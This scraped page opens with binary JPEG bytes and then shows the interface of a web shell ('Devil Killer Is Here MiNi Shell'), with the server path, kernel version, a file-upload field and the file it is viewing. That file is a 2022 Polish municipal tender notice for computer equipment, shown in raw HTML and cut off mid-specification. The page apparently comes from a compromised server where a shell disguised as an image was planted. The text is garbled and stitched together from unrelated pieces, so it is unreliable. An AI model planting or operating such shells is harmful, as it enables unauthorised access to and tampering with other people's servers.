JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220714/0025464801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego w ramach projektu Cyfrowa Gmina </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rzekuń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667959</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzekuń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ppietrzak@rzekun.net</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzekun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego w ramach projektu Cyfrowa Gmina </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1ef4d41e-034d-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00254648</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00049832/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu komputerowego w ramach projektu Cyfrowa Gmina</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Polska Cyfrowa na lata 2014-2020 Osi na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowej JST oraz wzmocnienie cyfrowej pt. Cyfrowa Gmna-Wsparcie dzieci z rodzin peegerowskich w rozwoju cyfrowym- ,,Granty PPGR&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.rzekun.pl/zamowienia-publiczne/przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej.2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na<br/>ePUAP.Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:„Formularz<br/>do złożenia, zmiany,wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 3.Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej ( ePUAP ).4. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”i<br/>„Formularza do komunikacji” wynosi 150 MB.5. Za datę przekazania oferty, wniosków,<br/>zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 6. Zamawiający<br/>przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o<br/>Ochronie Danych (RODO) informujemy, że:<br/>1) Administratorem danych osobowych Wykonawców biorących udział w postępowaniu o udzielenie<br/>zamówienia publicznego jest Urząd Gminy w Rzekuniu, adres: ul. Kościuszki 33, 07-411 Rzekuń;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogę się kontaktować w sprawach<br/>przetwarzania moich danych osobowych za pośrednictwem poczty elektronicznej: ug@rzekun.pl;<br/>3) Administrator będzie przetwarzał Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w<br/>zw. z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych (Pzp) w celu związanym z<br/>prowadzonym postępowaniem o udzielenie zamówienia publicznego;<br/>4) Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów<br/>prawa, a także podmiotom, z którymi Administrator zawarł umowę w związku z realizacją usług na<br/>rzecz Administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrznym audytorem).<br/>Odbiorcami danych będą także osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych (Pzp);<br/>5) Administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej;<br/>6) Mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie Administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Państwa dane osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przypadku<br/>zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej)<br/>przez okres wskazany w wytycznych w zakresie kwalifikowalności wydatków.<br/>2) Przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia<br/>przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych, przy czym:<br/>a. w przypadku obowiązków wynikających z art. 15 ust. 1-3 RODO zamawiający ma prawo żądać od<br/>osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>b. skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>c. prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania. Prawo do ograniczenia przetwarzania danych<br/>osobowych nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania<br/>ze środków ochrony prawnej w celu ochrony praw innej osoby fizycznej i prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>3) Podanie danych osobowych jest dobrowolne, jednakże niezbędne do przeprowadzenia<br/>postępowaniem o udzielenie zamówienia publicznego. Konsekwencje niepodania danych określa<br/>ustawa Pzp. Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa<br/>dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FPZ.271.1.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia - Stacje robocze (35 szt.)<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Obudowa<br/> • All-in-One (monitor zintegrowany z jednostką centralną);<br/> • Dostęp do płyty głównej komputera bez użycia dodatkowych narzędzi.<br/> • Montaż i demontaż podstawy jednostki bez użycia dodatkowych narzędzi.<br/> • Podstawa umożliwiająca regulacje „monitora”: kąt nachylenia, obrót (pivot), wysokość oraz obracanie ekranu na boki.<br/> • Włącznik zasilania umieszczony na frontowej części jednostki.<br/> • Podstawa zawierająca rozwiązania ułatwiające organizację okablowania.<br/> • Slot na zabezpieczenie Kensington.<br/> • Sygnalizacja optyczna stanu pracy zasilacza.<br/> • Sygnalizacja optyczna pracy jednostki (na froncie lub z boku).<br/> • Sygnalizacja optyczna pracy dysku twardego (na froncie lub z boku).<br/> • Kolorystyka: stonowana, biznesowa.<br/>2<br/>Ekran<br/> • Przekątna minimum 23,8 cala.<br/> • Rozdzielczość natywna minimum 1920x1080p.<br/> • Jasność minimum 200 nitów.<br/> • Kontrast minimum 700:1.<br/> • Kąty widzenia minimum: 170 st. w pionie i poziomie.<br/> • Powierzchnia: matowa, antyodblaskowa.<br/> • Matryca klasy IPS lub VA.<br/>3<br/>Procesor<br/> • Minimum 6 rdzeni (12T) o częstotliwości bazowej minimum 3,2 GHz.<br/> • Osiągający wynik Passmark (minimalnie): 2800 dla jednego rdzenia i minimum 12000 łącznie dla wszystkich rdzeni.<br/>4<br/>Pamięć operacyjna<br/> • Minimum 16GB DDR4 non ECC<br/> • Rozszerzalna do minimum 32 GB<br/>5<br/>Pamięć dyskowa<br/> • Minimum 500GB PCIe NVMe SSD.<br/>6<br/>Karta graficzna<br/> • Zintegrowana z procesorem.<br/>7<br/>Łączność<br/> • karta sieciowa Ethernet wbudowana przez producenta jednostki: 10/100/1000 Mbps<br/> • karta sieciowa Wi-Fi wbudowana przez producenta jednostki: Wi-Fi 802.11 a/b/g, Wi-Fi 4 (WiFi 802.11n), Wi-Fi 5 (WiFi 802.11ac), Wi-Fi 6 (WiFi 802.11ax)<br/> • Bluetooth 5.0<br/>8<br/>Kamera<br/> • Zintegrowana z obudową jednostki (nierozłączna).<br/> • Z rozwiązaniem pozwalającym na mechaniczne zakrycie/chowanie.<br/> • Optyczna sygnalizacja informującą o pracy kamery.<br/> • Rozdzielczość natywna minimum 1920 x 1080p przy 30 kl/s<br/>9<br/>Mikrofon<br/> • Zintegrowany z obudową jednostki (nierozłączny).<br/>10<br/>Czytnik kart<br/> • Zintegrowany z obudową jednostki (nierozłączny).<br/> • Obsługa kart: SDHC, SDXC, SD 4.0, SD UHS-I, SD UHS-II.<br/>11<br/>Głośniki<br/> • Minimum 2 x 4W.<br/> • Zintegrowane z obudową jednostki (nierozłączne).<br/>12<br/>Zasilanie<br/> • Zasilacz zintegrowany w obudowie jednostki (nierozłączny).<br/> • Certyfikat sprawności zasilacza minimum „80 Plus Bronze”.<br/> • Zgodność z ErP Lot6 Tier 2<br/> • Zgodność z Energy Star 8.0<br/> • Maksymalna moc zasilacza: 180 W.<br/>13<br/>Złącza zewnętrzne<br/> • Dostępne z przodu lub boku jednostki: czytnik kart SD, gniazdo audio combo, port USB 3.1, port USB 3.1 Typ C<br/> • Pozostałe: HDMI 1.4 IN lub DisplayPort IN, HDMI 2.0 OUT lub DisplayPort 1.4a/HDCP 2.3, RJ45 Ethernet, minimum 4x port USB 3.1, Audio out, gniazado zasilania.<br/>14<br/>Złącza wewnętrzne<br/> • Minimum 1 wolne gniazdo PCIe NVMe Gen4 x4 na dysk M.2 2230/2280 SSD<br/> • Minimum 1 wolne gniazdo SATA3 na dysk 2,5 cala<br/> • Minimum 2 gniazda SO-DIMM DDR4 lub DDR5<br/>15<br/>Klawiatura<br/> • Bezprzewodowa z sygnalizacją klawiszy przełączających (Caps Lock, itd.)<br/> • Układ: QWERTY, US International<br/> • współużytkowana z myszą, dołączony odbiornik 2.4GHz na USB.<br/>16<br/>Mysz<br/> • Bezprzewodowa z rolką, współużytkowana z klawiaturą, dołączony odbiornik 2.4GHz na USB<br/>17<br/>System operacyjny<br/> • Microsoft Windows 11 Professional PL 64-bit z możliwością/ licencją pozwalającą na downgrade do Windows 10 Professional PL 64-bit<br/>18<br/>Gwarancja producenta <br/> • 36 miesięcy z możliwością zachowania dysku twardego przez Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.2. Część II zamówienia - Serwery (2 szt):<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Zgodność<br/> • Potwierdzona zgodność dla producenta, modelu i rodziny procesorów z ESXi 7.0 U3 na liście „VMware Compatibility Guide” (https://www.vmware.com/resources/compatibility/search.php)<br/>2<br/>Przeznaczenie i warunki użytkowania<br/> • Server/Enterprise<br/>3<br/>Obudowa<br/> • Typ: Rack, maksymalnie 2U, <br/> • z szynami ruchomymi i ramieniem na kable,<br/> • wyposażona w wyświetlacz LCD informujący o stanie serwera,<br/> • posiadająca rozwiązanie chroniące dyski przed nieuprawnionym wyjęciem.<br/> • obsługująca minimalnie 8 dysków SAS/SATA 3.5cala<br/>4<br/>Procesory<br/> • Minimum dwa procesory, każdy minimum 16-rdzeniowy (32T) o częstotliwości bazowej minimum 2.4 GHz.<br/>5<br/>Pamięć operacyjna<br/> • Minimalnie 4 x 32GB DDR4 RDIMM Dual Rank ECC<br/>6<br/>Kontroler RAID<br/> • Sprzętowy, <br/> • minimalnie 8 GB cache, <br/> • obsługa RAID 0/1/5/6/10/50/60, <br/> • obsługa interfejsów SAS/SATA, <br/> • PCIe Gen. 4.<br/>7<br/>Dyski twarde<br/> • 4x 3,5” 8TB HDD NLSAS 7.2k SAS 12Gb/s w obudowie Hot-Plug,<br/> • 4x 2,5” 960GB SSD SATA 6Gb/s (przeznaczenie read intensive) w obudowie Hot-Plug<br/>8<br/>Napęd<br/> • DVD-ROM, wewnętrzny<br/>9<br/>Karty sieciowe<br/> • 2x RJ-45, 1Gb/s, 1000Base-T<br/> • 2x RJ-45, 10Gb/s, 10GBase-T<br/> • 2x SFP+, 10Gb/s, SFP+<br/>10<br/>Zasilanie<br/> • Dwa redundantne zasilacze.<br/>11<br/>Oprogramowanie<br/> • Microsoft Windows Server 2022 Standard (16 CORE) <br/>12<br/>Zdalne zarządzanie<br/> • Moduł zdalnego zarządzania, diagnostyki i monitorowania pracy serwera z dedykowanym portem RJ-45.<br/>13<br/>Gwarancja producenta <br/> 60 miesięcy gwarancji w trybie „Next Business Day” z możliwością pozostawienia dysków twardych w przypadku awarii u Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237400-3 - Akcesoria do wprowadzania danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.3. Część III zamówienia - Komputery przenośne (30 szt.):<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Obudowa<br/> • Kolorystyka: stonowana, biznesowa<br/> • Możliwość zabezpieczenia linką (port Kensington Lock)<br/>2<br/>Ekran<br/> • Przekątna minimalna 15,6 cala<br/> • Powierzchnia matowa<br/> • Rozdzielczość natywna 1920 x 1080 (Full HD) <br/> • Jasność minimalna 250 cd/m2<br/> • Matryca klasy IPS lub VA<br/>3<br/>Procesor<br/> • Minimalnie 2 rdzenie (4T), częstotliwość bazowa minimalnie 3 GHz, osiągający wynik Passmark (minimalnie): 2600 dla jednego rdzenia i minimalnie 6000 łącznie dla wszystkich rdzeni.<br/>4<br/>Pamięć operacyjna<br/> • Minimalnie 1x 8 GB DDR4, rozszerzalna do minimum 16 GB<br/>5<br/>Pamięć dyskowa<br/> • Minimalnie 480 GB <br/> • Typ: SSD<br/>6<br/>Karta graficzna<br/> • Zintegrowana z procesorem.<br/>7<br/>Łączność<br/> • Wi-Fi: minimum Wi-Fi 802.11 b/g/n<br/> • Bluetooth 4.1<br/>8<br/>Kamera<br/> • Wbudowana<br/>9<br/>Mikrofon<br/> • Wbudowany<br/>11<br/>Głośniki<br/> • Wbudowane, stereo<br/>13<br/>Złącza zewnętrzne<br/> • USB 2.0 – minimum 1 szt.<br/> • USB 3.2 - minimum 1 szt.<br/> • USB Typ-C – minimum 1 szt.<br/> • HDMI 1.4 – minimum 1 szt.<br/> • Wyjście słuchawkowe/wejście mikrofonowe (audio combo) - 1 szt.<br/>15<br/>Klawiatura<br/> • Wydzielona klawiatura numeryczna<br/> • Touchpad<br/>16<br/>Bateria<br/> • Tak<br/><br/>Waga<br/> • Maksymalnie 1,8 kg (bez zasilacza, z baterią).<br/>17<br/>System operacyjny<br/> • System operacyjny powinien udostępniać narzędzia wspomagające osoby niepełnosprawne : podpisy kodowane, wizualne wyświetlanie alertów systemowych, dźwięk monofoniczny, duży kontrast wyświetlanego obrazu, powiększenie obrazu (lupa), narrator, filtry kolorów do ekranu, dostosowywanie wielkości i wyglądu kursora i 